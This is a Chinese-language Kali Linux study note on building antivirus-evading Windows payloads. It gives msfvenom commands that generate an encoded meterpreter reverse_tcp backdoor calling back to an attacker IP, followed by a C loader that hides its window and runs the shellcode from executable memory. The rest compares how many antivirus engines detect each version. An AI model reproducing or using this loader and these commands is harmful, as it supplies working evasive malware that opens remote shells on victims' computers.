Kali的学习笔记篇(八)使用msf生成的shellcode制作免杀payload

时间:2024-10-25 07:34:37

环境:

    kali-linux-2018.  

    Visual Studio 2017

    msfvenom

   更新时间:2018年8月13日07:06:43

直接注入的生成方式(一):

  1. //生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码
  2. root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.113 LPORT=55555 -f exe >

输出c格式的方式(二):

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' LHOST=192.168.1.113 LPORT=55555 -f c

使用VS2017,将生成的c代码复制到shellcode is here

  1. #include ""
  2. #include ""
  3. #include ""
  4. #pragma comment(linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"")//运行时不显示窗口
  5. unsigned char shellcode[] =
  6. "shellcode is here";
  7. void main()
  8. {
  9. LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  10. memcpy(Memory, shellcode, sizeof(shellcode));
  11. ((void(*)())Memory)();
  12. }

修改一下项目属性,最后生成exe程序

 

使用在线杀软引擎测试普通生成和c编译的免杀率对比

方式一:

最低百分五十:

几乎百分百:

方式二:

大概六分之一几率:

其中主流杀软如360等免杀成功:

 

根据测试数据,那么第一种方式最低百分之五十会被杀软检测到,最高百分之九十以上。

第二种几率降低了很多,虽说TX,360都过了,但是这并不是我想要的,,

因为我的火绒在电脑上几乎百分百拦截。

 

记录每一次测试,如果有大佬会的烦请留下提点一二,谢谢。